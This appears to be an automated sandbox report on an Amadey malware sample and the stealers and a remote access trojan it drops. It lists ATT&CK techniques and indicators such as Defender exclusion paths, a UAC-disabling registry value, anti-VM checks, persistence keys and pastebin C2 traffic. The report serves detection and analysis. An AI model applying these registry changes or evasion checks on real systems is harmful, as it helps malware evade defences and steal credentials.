amadey | b3913ee6a28e6ca1f3d226ff1f7d2c68028bb9f7c16b82105475e7155224668a

Windows Service

T1543.003

Processes:

AppGate2103v01_16.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1"	AppGate2103v01_16.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 4 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Roaming\configurationValue\Traffic.exe	family_redline
C:\Users\Admin\AppData\Roaming\configurationValue\propro.exe	family_redline
behavioral2/memory/4432-529-0x0000000000400000-0x0000000000452000-memory.dmp	family_redline
C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe	family_redline

RisePro
RisePro stealer is an infostealer distributed by PrivateLoader.
stealer risepro
Stealc
Stealc is an infostealer written in C++.
stealer stealc
UAC bypass 3 TTPs 1 IoCs
evasion trojan

Bypass User Account Control
T1548.002

Disable or Modify Tools
T1562.001

Modify Registry
T1112

Processes:

Uni400uni.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Uni400uni.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Uni400uni.exe

Windows security bypass 2 TTPs 7 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

Processes:

4767d2e713f2021e8fe856e3ea638b58.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	4767d2e713f2021e8fe856e3ea638b58.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	4767d2e713f2021e8fe856e3ea638b58.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\4767d2e713f2021e8fe856e3ea638b58.exe = "0"	4767d2e713f2021e8fe856e3ea638b58.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	4767d2e713f2021e8fe856e3ea638b58.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	4767d2e713f2021e8fe856e3ea638b58.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	4767d2e713f2021e8fe856e3ea638b58.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	4767d2e713f2021e8fe856e3ea638b58.exe

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 12 IoCs

evasion

Query Registry

Virtualization/Sandbox Evasion

Processes:

explorha.exeexplorha.exeamert.exeexplorha.exeexplorha.exeexplorha.exe83495a94e8.exechrosha.exeAppGate2103v01_16.exeexplorha.exeexplorha.exeb3913ee6a28e6ca1f3d226ff1f7d2c68028bb9f7c16b82105475e7155224668a.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorha.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorha.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	amert.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorha.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorha.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorha.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	83495a94e8.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	chrosha.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	AppGate2103v01_16.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorha.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorha.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	b3913ee6a28e6ca1f3d226ff1f7d2c68028bb9f7c16b82105475e7155224668a.exe

Blocklisted process makes network request 6 IoCs

Processes:

rundll32.exerundll32.exerundll32.exerundll32.exe

flow pid process

40 5084 rundll32.exe
45 5936 rundll32.exe
133 2304 rundll32.exe
145 4232 rundll32.exe
45 5936 rundll32.exe
145 4232 rundll32.exe
Creates new service(s) 1 TTPs
persistence

Windows Service
T1543.003
Downloads MZ/PE file
Modifies Windows Firewall 2 TTPs 1 IoCs
evasion

Windows Service
T1543.003

Disable or Modify System Firewall
T1562.004

Processes:

netsh.exe

pid process

6308 netsh.exe
Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

flow	pid	process
40	5084	rundll32.exe
45	5936	rundll32.exe
133	2304	rundll32.exe
145	4232	rundll32.exe
45	5936	rundll32.exe
145	4232	rundll32.exe

pid	process
6308	netsh.exe

Checks BIOS information in registry 2 TTPs 24 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

explorha.exe83495a94e8.exeexplorha.exeexplorha.exeamert.exeexplorha.exeb3913ee6a28e6ca1f3d226ff1f7d2c68028bb9f7c16b82105475e7155224668a.exeexplorha.exechrosha.exeexplorha.exeAppGate2103v01_16.exeexplorha.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	83495a94e8.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	amert.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	b3913ee6a28e6ca1f3d226ff1f7d2c68028bb9f7c16b82105475e7155224668a.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	83495a94e8.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	amert.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	chrosha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	chrosha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	b3913ee6a28e6ca1f3d226ff1f7d2c68028bb9f7c16b82105475e7155224668a.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	AppGate2103v01_16.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	AppGate2103v01_16.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorha.exe

Executes dropped EXE 40 IoCs

Processes:

explorha.exe1854307fae.exe83495a94e8.exeexplorha.exeexplorha.exeamert.exeexplorha.exechrosha.exeswiiiii.exealexxxxxxxx.exeTraffic.exepropro.exegold.exeNewB.exeISetup8.exejok.exeswiiii.exetoolspub1.exefile300un.exeu4n4.0.exeQg_Appv5.exe4767d2e713f2021e8fe856e3ea638b58.exeu4n4.1.exeFirstZ.exeptInst.exeUni400uni.exeptInst.exeAppGate2103v01_16.exe4767d2e713f2021e8fe856e3ea638b58.exereakuqnanrkn.execsrss.exeexplorha.exeNewB.exeinjector.exewindefender.exewindefender.exeexplorha.exeNewB.exeexplorha.exeNewB.exe

pid	process
716	explorha.exe
1976	1854307fae.exe
60	83495a94e8.exe
3412	explorha.exe
2856	explorha.exe
5288	amert.exe
5580	explorha.exe
2212	chrosha.exe
5412	swiiiii.exe
5928	alexxxxxxxx.exe
6136	Traffic.exe
6108	propro.exe
5460	gold.exe
5356	NewB.exe
6016	ISetup8.exe
1468	jok.exe
3632	swiiii.exe
5564	toolspub1.exe
5864	file300un.exe
236	u4n4.0.exe
1448	Qg_Appv5.exe
4224	4767d2e713f2021e8fe856e3ea638b58.exe
3872	u4n4.1.exe
5148	FirstZ.exe
5872	ptInst.exe
3084	Uni400uni.exe
4928	ptInst.exe
5836	AppGate2103v01_16.exe
6360	4767d2e713f2021e8fe856e3ea638b58.exe
3476	reakuqnanrkn.exe
6016	csrss.exe
7008	explorha.exe
7124	NewB.exe
640	injector.exe
1824	windefender.exe
6256	windefender.exe
6516	explorha.exe
3068	NewB.exe
6964	explorha.exe
6868	NewB.exe

Identifies Wine through registry keys 2 TTPs 11 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

Virtualization/Sandbox Evasion

Processes:

explorha.exeb3913ee6a28e6ca1f3d226ff1f7d2c68028bb9f7c16b82105475e7155224668a.exe83495a94e8.exeexplorha.exechrosha.exeexplorha.exeexplorha.exeexplorha.exeexplorha.exeamert.exeexplorha.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Software\Wine	explorha.exe
Key opened	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Software\Wine	b3913ee6a28e6ca1f3d226ff1f7d2c68028bb9f7c16b82105475e7155224668a.exe
Key opened	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Software\Wine	83495a94e8.exe
Key opened	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Software\Wine	explorha.exe
Key opened	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Software\Wine	chrosha.exe
Key opened	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Software\Wine	explorha.exe
Key opened	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Software\Wine	explorha.exe
Key opened	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Software\Wine	explorha.exe
Key opened	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Software\Wine	explorha.exe
Key opened	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Software\Wine	amert.exe
Key opened	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Software\Wine	explorha.exe

Loads dropped DLL 14 IoCs

Processes:

rundll32.exerundll32.exerundll32.exerundll32.exerundll32.exeRegAsm.exeptInst.exeptInst.exerundll32.exe

pid	process
4544	rundll32.exe
5084	rundll32.exe
5936	rundll32.exe
5448	rundll32.exe
2304	rundll32.exe
2028	RegAsm.exe
5872	ptInst.exe
5872	ptInst.exe
5872	ptInst.exe
2028	RegAsm.exe
4928	ptInst.exe
4928	ptInst.exe
4928	ptInst.exe
4232	rundll32.exe

Reads WinSCP keys stored on the system 2 TTPs
Tries to access WinSCP stored sessions.
spyware stealer

Data from Local System
T1005

Credentials in Registry
T1552.002
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Themida packer 1 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\1000217001\AppGate2103v01_16.exe	themida

Windows security modification 2 TTPs 7 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

Processes:

4767d2e713f2021e8fe856e3ea638b58.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	4767d2e713f2021e8fe856e3ea638b58.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	4767d2e713f2021e8fe856e3ea638b58.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\4767d2e713f2021e8fe856e3ea638b58.exe = "0"	4767d2e713f2021e8fe856e3ea638b58.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	4767d2e713f2021e8fe856e3ea638b58.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	4767d2e713f2021e8fe856e3ea638b58.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	4767d2e713f2021e8fe856e3ea638b58.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	4767d2e713f2021e8fe856e3ea638b58.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

Processes:

explorha.exe4767d2e713f2021e8fe856e3ea638b58.execsrss.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Software\Microsoft\Windows\CurrentVersion\Run\1854307fae.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000055001\\1854307fae.exe"	explorha.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Software\Microsoft\Windows\CurrentVersion\Run\83495a94e8.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000056001\\83495a94e8.exe"	explorha.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	4767d2e713f2021e8fe856e3ea638b58.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	csrss.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 3 IoCs

evasion trojan

System Information Discovery

Processes:

Uni400uni.exeAppGate2103v01_16.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Uni400uni.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Uni400uni.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	AppGate2103v01_16.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs

Web Service
T1102

Processes:

flow ioc

144 pastebin.com
177 pastebin.com
178 pastebin.com
128 pastebin.com
130 pastebin.com
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

154 api.myip.com
155 ipinfo.io
156 ipinfo.io
153 api.myip.com
Manipulates WinMonFS driver. 1 IoCs
Roottkits write to WinMonFS to hide directories/files from being detected.
rootkit evasion

Processes:

csrss.exe

description ioc process

File opened for modification \??\WinMonFS csrss.exe

flow	ioc
144	pastebin.com
177	pastebin.com
178	pastebin.com
128	pastebin.com
130	pastebin.com

flow	ioc
154	api.myip.com
155	ipinfo.io
156	ipinfo.io
153	api.myip.com

description	ioc	process
File opened for modification	\??\WinMonFS	csrss.exe

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\1000055001\1854307fae.exe	autoit_exe

Drops file in System32 directory 15 IoCs

Processes:

AppGate2103v01_16.exepowershell.exeFirstZ.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exereakuqnanrkn.exe

description	ioc	process
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	AppGate2103v01_16.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	FirstZ.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\System32\GroupPolicy	AppGate2103v01_16.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	AppGate2103v01_16.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	AppGate2103v01_16.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	reakuqnanrkn.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs

Processes:

b3913ee6a28e6ca1f3d226ff1f7d2c68028bb9f7c16b82105475e7155224668a.exeexplorha.exe83495a94e8.exeexplorha.exeexplorha.exeamert.exeexplorha.exechrosha.exeAppGate2103v01_16.exeexplorha.exeexplorha.exeexplorha.exe

pid	process
2520	b3913ee6a28e6ca1f3d226ff1f7d2c68028bb9f7c16b82105475e7155224668a.exe
716	explorha.exe
60	83495a94e8.exe
3412	explorha.exe
2856	explorha.exe
5288	amert.exe
5580	explorha.exe
2212	chrosha.exe
5836	AppGate2103v01_16.exe
7008	explorha.exe
6516	explorha.exe
6964	explorha.exe

Suspicious use of SetThreadContext 11 IoCs

Processes:

explorha.exeswiiiii.exealexxxxxxxx.exegold.exeswiiii.exefile300un.exeUni400uni.exeptInst.execmd.exereakuqnanrkn.exe

description	pid	process	target process
PID 716 set thread context of 2856	716	explorha.exe	explorha.exe
PID 5412 set thread context of 3768	5412	swiiiii.exe	RegAsm.exe
PID 5928 set thread context of 2156	5928	alexxxxxxxx.exe	RegAsm.exe
PID 5460 set thread context of 4432	5460	gold.exe	RegAsm.exe
PID 3632 set thread context of 2028	3632	swiiii.exe	RegAsm.exe
PID 5864 set thread context of 5100	5864	file300un.exe	AddInProcess32.exe
PID 3084 set thread context of 3176	3084	Uni400uni.exe	msbuild.exe
PID 4928 set thread context of 2056	4928	ptInst.exe	cmd.exe
PID 2056 set thread context of 4220	2056	cmd.exe	MSBuild.exe
PID 3476 set thread context of 2228	3476	reakuqnanrkn.exe	conhost.exe
PID 3476 set thread context of 7044	3476	reakuqnanrkn.exe	explorer.exe

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery
T1082

Processes:

4767d2e713f2021e8fe856e3ea638b58.exe

description ioc process

File opened (read-only) \??\VBoxMiniRdrDN 4767d2e713f2021e8fe856e3ea638b58.exe

description	ioc	process
File opened (read-only)	\??\VBoxMiniRdrDN	4767d2e713f2021e8fe856e3ea638b58.exe

Drops file in Windows directory 6 IoCs

Processes:

csrss.exeb3913ee6a28e6ca1f3d226ff1f7d2c68028bb9f7c16b82105475e7155224668a.exeamert.exe4767d2e713f2021e8fe856e3ea638b58.exe

description	ioc	process
File created	C:\Windows\windefender.exe	csrss.exe
File opened for modification	C:\Windows\windefender.exe	csrss.exe
File created	C:\Windows\Tasks\explorha.job	b3913ee6a28e6ca1f3d226ff1f7d2c68028bb9f7c16b82105475e7155224668a.exe
File created	C:\Windows\Tasks\chrosha.job	amert.exe
File opened for modification	C:\Windows\rss	4767d2e713f2021e8fe856e3ea638b58.exe
File created	C:\Windows\rss\csrss.exe	4767d2e713f2021e8fe856e3ea638b58.exe

Launches sc.exe 15 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid	process
2980	sc.exe
6856	sc.exe
6064	sc.exe
2664	sc.exe
6308	sc.exe
7036	sc.exe
6900	sc.exe
6964	sc.exe
5036	sc.exe
7028	sc.exe
5080	sc.exe
6260	sc.exe
1044	sc.exe
6852	sc.exe
5896	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 2 IoCs

Processes:

WerFault.exeWerFault.exe

pid pid_target process target process

5848 5412 WerFault.exe swiiiii.exe
5560 5564 WerFault.exe toolspub1.exe

pid	pid_target	process	target process
5848	5412	WerFault.exe	swiiiii.exe
5560	5564	WerFault.exe	toolspub1.exe

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

toolspub1.exeu4n4.1.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub1.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub1.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u4n4.1.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u4n4.1.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u4n4.1.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

RegAsm.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	RegAsm.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	RegAsm.exe

Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exe

pid process

1628 schtasks.exe
1452 schtasks.exe
1308 schtasks.exe

pid	process
1628	schtasks.exe
1452	schtasks.exe
1308	schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

System Information Discovery

Processes:

chrome.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

windefender.exe4767d2e713f2021e8fe856e3ea638b58.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exechrome.exepowershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2512 = "Lord Howe Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-632 = "Tokyo Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1831 = "Russia TZ 2 Daylight Time"	4767d2e713f2021e8fe856e3ea638b58.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2432 = "Cuba Standard Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-12 = "Azores Standard Time"	4767d2e713f2021e8fe856e3ea638b58.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-152 = "Central America Standard Time"	4767d2e713f2021e8fe856e3ea638b58.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-751 = "Tonga Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-361 = "GTB Daylight Time"	4767d2e713f2021e8fe856e3ea638b58.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time"	4767d2e713f2021e8fe856e3ea638b58.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-631 = "Tokyo Daylight Time"	4767d2e713f2021e8fe856e3ea638b58.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time"	4767d2e713f2021e8fe856e3ea638b58.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-621 = "Korea Daylight Time"	4767d2e713f2021e8fe856e3ea638b58.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
